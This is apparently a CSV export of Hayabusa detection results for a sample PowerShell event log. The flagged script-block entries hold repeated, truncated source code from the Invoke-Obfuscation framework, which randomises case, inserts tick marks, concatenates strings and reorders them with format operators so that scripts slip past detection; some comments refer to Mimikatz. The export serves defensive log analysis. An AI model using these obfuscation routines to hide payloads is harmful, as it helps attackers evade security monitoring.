""string ${var name with whitespace} string"" or ""string $(gci *whitespace_in_command*) string"" $TokenContentSplit = $TokenContent.Split(' ') $ContainsVariableSpecialCases = (($TokenContent.Contains('$(') -OR $TokenContent.Contains('${')) -AND ($ScriptString[$Token.Start] -eq '""')) If($ContainsVariableSpecialCases) { $TokenContentSplit = $TokenContent } ForEach($SubToken in $TokenContentSplit) { $Counter++ $ObfuscatedSubToken = $SubToken # Determine if use case of variable inside of double quotes is present as this will be handled differently below. $SpecialCaseContainsVariableInDoubleQuotes = (($ObfuscatedSubToken.Contains('$') -OR $ObfuscatedSubToken.Contains('`')) -AND ($ScriptString[$Token.Start] -eq '""')) # Since splitting on whitespace removes legitimate whitespace we need to add back whitespace for all but the final subtoken. If($Counter -lt $TokenContent.Split(' ').Count) { $ObfuscatedSubToken = $ObfuscatedSubToken + ' ' } # Concatenate $SubToken if it's long enough to be concatenated. If(($ObfuscatedSubToken.Length -gt 1) -AND !($SpecialCaseContainsVariableInDoubleQuotes)) { # Concatenate each $SubToken via Out-StringDelimitedAndConcatenated so it will handle any replacements for special characters. # Define -PassThru flag so an invocation is not added to $ObfuscatedSubToken. $ObfuscatedSubToken = Out-StringDelimitedAndConcatenated $ObfuscatedSubToken -PassThru # Evenly trim leading/trailing parentheses. 
While($ObfuscatedSubToken.StartsWith('(') -AND $ObfuscatedSubToken.EndsWith(')')) { $ObfuscatedSubToken = ($ObfuscatedSubToken.SubString(1,$ObfuscatedSubToken.Length-2)).Trim() } } Else { If($SpecialCaseContainsVariableInDoubleQuotes) { $ObfuscatedSubToken = '""' + $ObfuscatedSubToken + '""' } ElseIf($ObfuscatedSubToken.Contains(""'"") -OR $ObfuscatedSubToken.Contains('$')) { $ObfuscatedSubToken = '""' + $ObfuscatedSubToken + '""' } Else { $ObfuscatedSubToken = ""'"" + $ObfuscatedSubToken + ""'"" } } # Add obfuscated/trimmed $SubToken back to $ObfuscatedToken if a Replace operati",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.243 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"on was used. If($ObfuscatedSubToken -eq $PreObfuscatedSubToken) { # Same, so don't encapsulate. And maybe take off trailing whitespace? } ElseIf($ObfuscatedSubToken.ToLower().Contains(""replace"")) { $ObfuscatedToken += ( '(' + $ObfuscatedSubToken + ')' + '+' ) } Else { $ObfuscatedToken += ($ObfuscatedSubToken + '+' ) } } # Trim extra whitespace and trailing + from $ObfuscatedToken. $ObfuscatedToken = $ObfuscatedToken.Trim(' + ') } Else { # For Parameter Binding the value has to either be plain concatenation or must be a scriptblock in which case we will encapsulate with {} instead of (). # The encapsulation will occur later in the function. At this point we're just setting the boolean variable $EncapsulateAsScriptBlockInsteadOfParentheses. 
# Actual error that led to this is: ""Attribute argument must be a constant or a script block."" # ALLOWED :: [CmdletBinding(DefaultParameterSetName={""{1}{0}{2}""-f'd','DumpCre','s'})] # NOT ALLOWED :: [CmdletBinding(DefaultParameterSetName=(""{1}{0}{2}""-f'd','DumpCre','s'))] $SubStringStart = 30 If($Token.Start -lt $SubStringStart) { $SubStringStart = $Token.Start } $SubString = $ScriptString.SubString($Token.Start-$SubStringStart,$SubStringStart).ToLower() If($SubString.Contains('defaultparametersetname') -AND $SubString.Contains('=')) { $EncapsulateAsScriptBlockInsteadOfParentheses = $TRUE } If($SubString.Contains('parametersetname') -AND !$SubString.Contains('defaultparametersetname') -AND $SubString.Contains('=')) { # For strings in ParameterSetName parameter binding (but not DefaultParameterSetName) then we will only obfuscate with tick marks. # Otherwise we may get errors depending on the version of PowerShell being run. $ObfuscatedToken = $Token.Content $TokenForTicks = [System.Management.Automation.PSParser]::Tokenize($ObfuscatedToken,[ref]$null) $ObfuscatedToken = '""' + (Out-ObfuscatedWithTicks $ObfuscatedToken $TokenForTicks[0]) + '""' } Else { # User input $ObfuscationLevel (1-2) will choose between concatenating String token value string or reordering it with the -f format operator. # I am leaving out Out-ObfuscatedStringCommand's option 3 since that may introduce a Type token unnecessarily ([Regex]). Switch($ObfuscationLevel) { 1 {$ObfuscatedToken = Out-StringDelimitedAndConcatenated $TokenContent -PassThru} 2 {$ObfuscatedToken = Out-StringDelimitedConcatenatedAndReordered $TokenContent -PassThru} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for String Token Obfuscation.""; Exit} } } # Evenly trim leading/trailing parentheses. 
While($ObfuscatedToken.StartsWith('(') -AND $ObfuscatedToken.EndsWith(')')) { $ObfuscatedToken = ($ObfuscatedToken.SubString(1,$ObfuscatedToken.Length-2)).Trim() } } # Encapsulate concatenated string with parentheses to avoid garbled string in scenarios like Write-* methods. If($ObfuscatedToken.Length -ne ($TokenContent.Length + 2)) { # For Parameter Binding the value has to either be plain concatenation or must be a scriptblock in which case we will encapsulate with {} instead of (). # Actual error that led to this is: ""Attribute argument must be a constant or a script block."" # ALLOWED :: [CmdletBinding(DefaultParameterSetName={""{1}{0}{2}""-f'd','DumpCre','s'})] # NOT ALLOWED :: [CmdletBinding(DefaultParameterSetName=(""{1}{0}{2}""-f'd','DumpCre','s'))] If($EncapsulateAsScriptBlockInsteadOfParentheses) { $ObfuscatedToken = '{' + $ObfuscatedToken + '}' } ElseIf(($ObfuscatedToken.Length -eq $TokenContent.Length + 5) -AND $ObfuscatedToken.SubString(2,$ObfuscatedToken.Length-4) -eq ($TokenContent + ' ')) { $ObfuscatedToken = $TokenContent } ElseIf($ObfuscatedToken.StartsWith('""') -AND $ObfuscatedToken.EndsWith('""') -AND !$ObfuscatedToken.Contains('+') -AND !$ObfuscatedToken.Contains('-f')) { # No encapsulation is needed for string obfuscation that is only double quotes and tick marks for ParameterSetName (and not DefaultParameterSetName). $ObfuscatedToken = $ObfuscatedToken } ElseIf($ObfuscatedToken.Length -ne $TokenContent.Length + 2) { $ObfuscatedToken = '(' + $ObfuscatedToken + ')' } } # Remove redundant blank string concatenations introduced by special use case of $ inside double quotes. If($ObfuscatedToken.EndsWith(""+''"") -OR $ObfuscatedToken.EndsWith('+""""')) { $ObfuscatedToken = $ObfuscatedToken.SubString(0,$ObfuscatedToken.Length-3) } # Handle dangling ticks from string concatenation where a substring ends in a tick. Move this tick to the beginning of the following substring. 
If($ObfuscatedToken.Contains('`')) { If($ObfuscatedToken.Contains('`""+""')) { $ObfuscatedToken = $ObfuscatedToken.Replace('`""+""','""+""`') } If($ObfuscatedToken.Contains(""``'+'"")) { $ObfuscatedToken = $ObfuscatedToken.Replace(""``'+'"",""'+'``"") } } # Add the obfuscated token back to $ScriptString. # If string is preceded by a . or :: and followed by ( then it is a Member token encapsulated by quotes and now treated as a string. # We must add a .Invoke to the concatenated Member string to avoid syntax errors. If((($Token.Start -gt 0) -AND ($ScriptString.SubString($Token.Start-1,1) -eq '.')) -OR (($Token.Start -gt 1) -AND ($ScriptString.SubString($Token.Start-2,2) -eq '::')) -AND ($ScriptString.SubString($Token.Start+$Token.Length,1) -eq '(')) { $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + '.Invoke' + $ScriptString.SubString($Token.Start+$Token.Length) } Else { $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) } Return $ScriptString } Function Out-ObfuscatedCommandTokenLevel2 { <# .SYNOPSIS Obfuscates command token by converting it to a concatenated string and using splatting to invoke the command. Invoke-Obfuscation Function: Out-ObfuscatedCommandTokenLevel2 Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-StringDelimitedAndConcatenated, Out-StringDelimitedConcatenatedAndReordered (both located in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-ObfuscatedCommandTokenLevel2 obfuscates a given command token and places it back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. 
For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .PARAMETER ObfuscationLevel Specifies whether to 1) Concatenate or 2) Reorder the splatted Command token value. .EXAMPLE C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'Command'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedCommandTokenLevel2 $ScriptString $Token 1} C:\PS> $ScriptString &('Wr'+'itE-'+'HOSt') 'Hello World!' -ForegroundColor Green; .('WrITe-Ho'+'s'+'t') 'Obfuscation Rocks!' -ForegroundColor Green C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'Command'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedCommandTokenLevel2 $ScriptString $Token 1} C:\PS> $ScriptString &(""{1}{0}{2}""-f'h','wRiTE-','ost') 'Hello World!' -ForegroundColor Green; .(""{2}{1}{0}"" -f'ost','-h','wrIte') 'Obfuscation Rocks!' -ForegroundColor Green .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. 
C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 'Command' 2 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token, [Parameter(Position = 2, Mandatory = $True)] [ValidateSet(1, 2)] [Int] $ObfuscationLevel ) # Set $Token.Content in a separate variable so it can be modified since Content is a ReadOnly property of $Token. $TokenContent = $Token.Content # If ticks are already present in current Token then remove so they will not interfere with string concatenation. If($TokenContent.Contains('`')) {$TokenContent = $TokenContent.Replace('`','')} # Convert $Token to character array for easier manipulation. $TokenArray = [Char[]]$TokenContent # Randomly upper- and lower-case characters in current token. $ObfuscatedToken = Out-RandomCase $TokenArray # User input $ObfuscationLevel (1-2) will choose between concatenating Command token value string (after trimming square brackets) or reordering it with the -F format operator. # I am leaving out Out-ObfuscatedStringCommand's option 3 since that may introduce a Type token unnecessarily ([Regex]). Switch($ObfuscationLevel) { 1 {$ObfuscatedToken = Out-StringDelimitedAndConcatenated $TokenContent -PassThru} 2 {$ObfuscatedToken = Out-StringDelimitedConcatenatedAndReordered $TokenContent -PassThru} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for Command Token Obfuscation.""; Exit} } # Evenly trim leading/trailing parentheses. 
While($ObfuscatedToken.StartsWith('(') -AND $ObfuscatedToken.EndsWith(')')) { $ObfuscatedToken = ($ObfuscatedToken.SubString(1,$ObfuscatedToken.Length-2)).Trim() } # Encapsulate $ObfuscatedToken with parentheses. $ObfuscatedToken = '(' + $ObfuscatedToken + ')' # Check if the command is already prepended with an invocation operator. If it is then do not add an invocation operator. # E.g. & powershell -Sta -Command $cmd # E.g. https://github.com/adaptivethreat/Empire/blob/master/data/module_source/situational_awareness/host/Invoke-WinEnum.ps1#L139 $SubStringLength = 15 If($Token.Start -lt $SubStringLength) { $SubStringLength = $Token.Start } # Extract substring leading up to the current token. $SubString = $ScriptString.SubString($Token.Start-$SubStringLength,$SubStringLength).Trim() # Set $InvokeOperatorAlreadyPresent boolean variable to TRUE if the substring ends with invocation operators . or & $InvokeOperatorAlreadyPresent = $FALSE If($SubString.EndsWith('.') -OR $SubString.EndsWith('&')) { $InvokeOperatorAlreadyPresent = $TRUE } If(!$InvokeOperatorAlreadyPresent) { # Randomly choose between the & and . Invoke Operators. # In certain large scripts where more than one parameter are being passed into a custom function # (like Add-SignedIntAsUnsigned in Invoke-Mimikatz.ps1) then using . will cause errors but & will not. # For now we will default to only & if $ScriptString.Length -gt 10000 If($ScriptString.Length -gt 10000) {$RandomInvokeOperator = '&'} Else {$RandomInvokeOperator = Get-Random -InputObject @('&','.')} # Add invoke operator (and potentially whitespace) to complete splatting command. $ObfuscatedToken = $RandomInvokeOperator + $ObfuscatedToken } # Add the obfuscated token back to $ScriptString. 
$ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } Function Out-ObfuscatedWithTicks { <# .SYNOPSIS HELPER FUNCTION :: Obfuscates any token by randomizing its case and randomly adding ticks. It takes PowerShell special characters into account so you will get `N instead of `n, `T instead of `t, etc. Invoke-Obfuscation Function: Out-ObfuscatedWithTicks Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-ObfuscatedWithTicks obfuscates given input as a helper function to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .EXAMPLE C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'Command'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedWithTicks $ScriptString $Token} C:\PS> $ScriptString WrI`Te-Ho`sT 'Hello World!' -ForegroundColor Green; WrIte-`hO`S`T 'Obfuscation Rocks!' 
-ForegroundColor Green .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 'Command' 2 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token ) # If ticks are already present in current Token then Return $ScriptString as is. If($Token.Content.Contains('`')) { Return $ScriptString } # The Parameter Attributes in $MemberTokensToOnlyRandomCase (defined at beginning of script) cannot be obfuscated like other Member Tokens # For these tokens we will only randomize the case and then return as is. # Source: https://social.technet.microsoft.com/wiki/contents/articles/15994.powershell-advanced-function-parameter-attributes.aspx If($MemberTokensToOnlyRandomCase -Contains $Token.Content.ToLower()) { $ObfuscatedToken = Out-RandomCase $Token.Content $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } # Set boolean variable to encapsulate member with double quotes if it is setting a value like below. # E.g. 
New-Object PSObject -Property @{ ""P`AY`LOaDS"" = $Payload } $EncapsulateWithDoubleQuotes = $FALSE If($ScriptString.SubString(0,$Token.Start).Contains('@{') -AND ($ScriptString.SubString($Token.Start+$Token.Length).Trim()[0] -eq '=')) { $EncapsulateWithDoubleQuotes = $TRUE } # Convert $Token to character array for easier manipulation. $TokenArray = [Char[]]$Token.Content # Randomly upper- and lower-case characters in current token. $TokenArray = Out-RandomCase $TokenArray",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.243 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"on was used. If($ObfuscatedSubToken -eq $PreObfuscatedSubToken) { # Same, so don't encapsulate. And maybe take off trailing whitespace? } ElseIf($ObfuscatedSubToken.ToLower().Contains(""replace"")) { $ObfuscatedToken += ( '(' + $ObfuscatedSubToken + ')' + '+' ) } Else { $ObfuscatedToken += ($ObfuscatedSubToken + '+' ) } } # Trim extra whitespace and trailing + from $ObfuscatedToken. $ObfuscatedToken = $ObfuscatedToken.Trim(' + ') } Else { # For Parameter Binding the value has to either be plain concatenation or must be a scriptblock in which case we will encapsulate with {} instead of (). # The encapsulation will occur later in the function. At this point we're just setting the boolean variable $EncapsulateAsScriptBlockInsteadOfParentheses. 
# Actual error that led to this is: ""Attribute argument must be a constant or a script block."" # ALLOWED :: [CmdletBinding(DefaultParameterSetName={""{1}{0}{2}""-f'd','DumpCre','s'})] # NOT ALLOWED :: [CmdletBinding(DefaultParameterSetName=(""{1}{0}{2}""-f'd','DumpCre','s'))] $SubStringStart = 30 If($Token.Start -lt $SubStringStart) { $SubStringStart = $Token.Start } $SubString = $ScriptString.SubString($Token.Start-$SubStringStart,$SubStringStart).ToLower() If($SubString.Contains('defaultparametersetname') -AND $SubString.Contains('=')) { $EncapsulateAsScriptBlockInsteadOfParentheses = $TRUE } If($SubString.Contains('parametersetname') -AND !$SubString.Contains('defaultparametersetname') -AND $SubString.Contains('=')) { # For strings in ParameterSetName parameter binding (but not DefaultParameterSetName) then we will only obfuscate with tick marks. # Otherwise we may get errors depending on the version of PowerShell being run. $ObfuscatedToken = $Token.Content $TokenForTicks = [System.Management.Automation.PSParser]::Tokenize($ObfuscatedToken,[ref]$null) $ObfuscatedToken = '""' + (Out-ObfuscatedWithTicks $ObfuscatedToken $TokenForTicks[0]) + '""' } Else { # User input $ObfuscationLevel (1-2) will choose between concatenating String token value string or reordering it with the -f format operator. # I am leaving out Out-ObfuscatedStringCommand's option 3 since that may introduce a Type token unnecessarily ([Regex]). Switch($ObfuscationLevel) { 1 {$ObfuscatedToken = Out-StringDelimitedAndConcatenated $TokenContent -PassThru} 2 {$ObfuscatedToken = Out-StringDelimitedConcatenatedAndReordered $TokenContent -PassThru} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for String Token Obfuscation.""; Exit} } } # Evenly trim leading/trailing parentheses. 
While($ObfuscatedToken.StartsWith('(') -AND $ObfuscatedToken.EndsWith(')')) { $ObfuscatedToken = ($ObfuscatedToken.SubString(1,$ObfuscatedToken.Length-2)).Trim() } } # Encapsulate concatenated string with parentheses to avoid garbled string in scenarios like Write-* methods. If($ObfuscatedToken.Length -ne ($TokenContent.Length + 2)) { # For Parameter Binding the value has to either be plain concatenation or must be a scriptblock in which case we will encapsulate with {} instead of (). # Actual error that led to this is: ""Attribute argument must be a constant or a script block."" # ALLOWED :: [CmdletBinding(DefaultParameterSetName={""{1}{0}{2}""-f'd','DumpCre','s'})] # NOT ALLOWED :: [CmdletBinding(DefaultParameterSetName=(""{1}{0}{2}""-f'd','DumpCre','s'))] If($EncapsulateAsScriptBlockInsteadOfParentheses) { $ObfuscatedToken = '{' + $ObfuscatedToken + '}' } ElseIf(($ObfuscatedToken.Length -eq $TokenContent.Length + 5) -AND $ObfuscatedToken.SubString(2,$ObfuscatedToken.Length-4) -eq ($TokenContent + ' ')) { $ObfuscatedToken = $TokenContent } ElseIf($ObfuscatedToken.StartsWith('""') -AND $ObfuscatedToken.EndsWith('""') -AND !$ObfuscatedToken.Contains('+') -AND !$ObfuscatedToken.Contains('-f')) { # No encapsulation is needed for string obfuscation that is only double quotes and tick marks for ParameterSetName (and not DefaultParameterSetName). $ObfuscatedToken = $ObfuscatedToken } ElseIf($ObfuscatedToken.Length -ne $TokenContent.Length + 2) { $ObfuscatedToken = '(' + $ObfuscatedToken + ')' } } # Remove redundant blank string concatenations introduced by special use case of $ inside double quotes. If($ObfuscatedToken.EndsWith(""+''"") -OR $ObfuscatedToken.EndsWith('+""""')) { $ObfuscatedToken = $ObfuscatedToken.SubString(0,$ObfuscatedToken.Length-3) } # Handle dangling ticks from string concatenation where a substring ends in a tick. Move this tick to the beginning of the following substring. 
If($ObfuscatedToken.Contains('`')) { If($ObfuscatedToken.Contains('`""+""')) { $ObfuscatedToken = $ObfuscatedToken.Replace('`""+""','""+""`') } If($ObfuscatedToken.Contains(""``'+'"")) { $ObfuscatedToken = $ObfuscatedToken.Replace(""``'+'"",""'+'``"") } } # Add the obfuscated token back to $ScriptString. # If string is preceded by a . or :: and followed by ( then it is a Member token encapsulated by quotes and now treated as a string. # We must add a .Invoke to the concatenated Member string to avoid syntax errors. If((($Token.Start -gt 0) -AND ($ScriptString.SubString($Token.Start-1,1) -eq '.')) -OR (($Token.Start -gt 1) -AND ($ScriptString.SubString($Token.Start-2,2) -eq '::')) -AND ($ScriptString.SubString($Token.Start+$Token.Length,1) -eq '(')) { $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + '.Invoke' + $ScriptString.SubString($Token.Start+$Token.Length) } Else { $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) } Return $ScriptString } Function Out-ObfuscatedCommandTokenLevel2 { <# .SYNOPSIS Obfuscates command token by converting it to a concatenated string and using splatting to invoke the command. Invoke-Obfuscation Function: Out-ObfuscatedCommandTokenLevel2 Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-StringDelimitedAndConcatenated, Out-StringDelimitedConcatenatedAndReordered (both located in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-ObfuscatedCommandTokenLevel2 obfuscates a given command token and places it back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. 
For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .PARAMETER ObfuscationLevel Specifies whether to 1) Concatenate or 2) Reorder the splatted Command token value. .EXAMPLE C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'Command'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedCommandTokenLevel2 $ScriptString $Token 1} C:\PS> $ScriptString &('Wr'+'itE-'+'HOSt') 'Hello World!' -ForegroundColor Green; .('WrITe-Ho'+'s'+'t') 'Obfuscation Rocks!' -ForegroundColor Green C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'Command'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedCommandTokenLevel2 $ScriptString $Token 1} C:\PS> $ScriptString &(""{1}{0}{2}""-f'h','wRiTE-','ost') 'Hello World!' -ForegroundColor Green; .(""{2}{1}{0}"" -f'ost','-h','wrIte') 'Obfuscation Rocks!' -ForegroundColor Green .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. 
C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 'Command' 2 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token, [Parameter(Position = 2, Mandatory = $True)] [ValidateSet(1, 2)] [Int] $ObfuscationLevel ) # Set $Token.Content in a separate variable so it can be modified since Content is a ReadOnly property of $Token. $TokenContent = $Token.Content # If ticks are already present in current Token then remove so they will not interfere with string concatenation. If($TokenContent.Contains('`')) {$TokenContent = $TokenContent.Replace('`','')} # Convert $Token to character array for easier manipulation. $TokenArray = [Char[]]$TokenContent # Randomly upper- and lower-case characters in current token. $ObfuscatedToken = Out-RandomCase $TokenArray # User input $ObfuscationLevel (1-2) will choose between concatenating Command token value string (after trimming square brackets) or reordering it with the -F format operator. # I am leaving out Out-ObfuscatedStringCommand's option 3 since that may introduce a Type token unnecessarily ([Regex]). Switch($ObfuscationLevel) { 1 {$ObfuscatedToken = Out-StringDelimitedAndConcatenated $TokenContent -PassThru} 2 {$ObfuscatedToken = Out-StringDelimitedConcatenatedAndReordered $TokenContent -PassThru} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for Command Token Obfuscation.""; Exit} } # Evenly trim leading/trailing parentheses. 
While($ObfuscatedToken.StartsWith('(') -AND $ObfuscatedToken.EndsWith(')')) { $ObfuscatedToken = ($ObfuscatedToken.SubString(1,$ObfuscatedToken.Length-2)).Trim() } # Encapsulate $ObfuscatedToken with parentheses. $ObfuscatedToken = '(' + $ObfuscatedToken + ')' # Check if the command is already prepended with an invocation operator. If it is then do not add an invocation operator. # E.g. & powershell -Sta -Command $cmd # E.g. https://github.com/adaptivethreat/Empire/blob/master/data/module_source/situational_awareness/host/Invoke-WinEnum.ps1#L139 $SubStringLength = 15 If($Token.Start -lt $SubStringLength) { $SubStringLength = $Token.Start } # Extract substring leading up to the current token. $SubString = $ScriptString.SubString($Token.Start-$SubStringLength,$SubStringLength).Trim() # Set $InvokeOperatorAlreadyPresent boolean variable to TRUE if the substring ends with invocation operators . or & $InvokeOperatorAlreadyPresent = $FALSE If($SubString.EndsWith('.') -OR $SubString.EndsWith('&')) { $InvokeOperatorAlreadyPresent = $TRUE } If(!$InvokeOperatorAlreadyPresent) { # Randomly choose between the & and . Invoke Operators. # In certain large scripts where more than one parameter are being passed into a custom function # (like Add-SignedIntAsUnsigned in Invoke-Mimikatz.ps1) then using . will cause errors but & will not. # For now we will default to only & if $ScriptString.Length -gt 10000 If($ScriptString.Length -gt 10000) {$RandomInvokeOperator = '&'} Else {$RandomInvokeOperator = Get-Random -InputObject @('&','.')} # Add invoke operator (and potentially whitespace) to complete splatting command. $ObfuscatedToken = $RandomInvokeOperator + $ObfuscatedToken } # Add the obfuscated token back to $ScriptString. 
$ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } Function Out-ObfuscatedWithTicks { <# .SYNOPSIS HELPER FUNCTION :: Obfuscates any token by randomizing its case and randomly adding ticks. It takes PowerShell special characters into account so you will get `N instead of `n, `T instead of `t, etc. Invoke-Obfuscation Function: Out-ObfuscatedWithTicks Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-ObfuscatedWithTicks obfuscates given input as a helper function to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .EXAMPLE C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'Command'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedWithTicks $ScriptString $Token} C:\PS> $ScriptString WrI`Te-Ho`sT 'Hello World!' -ForegroundColor Green; WrIte-`hO`S`T 'Obfuscation Rocks!' 
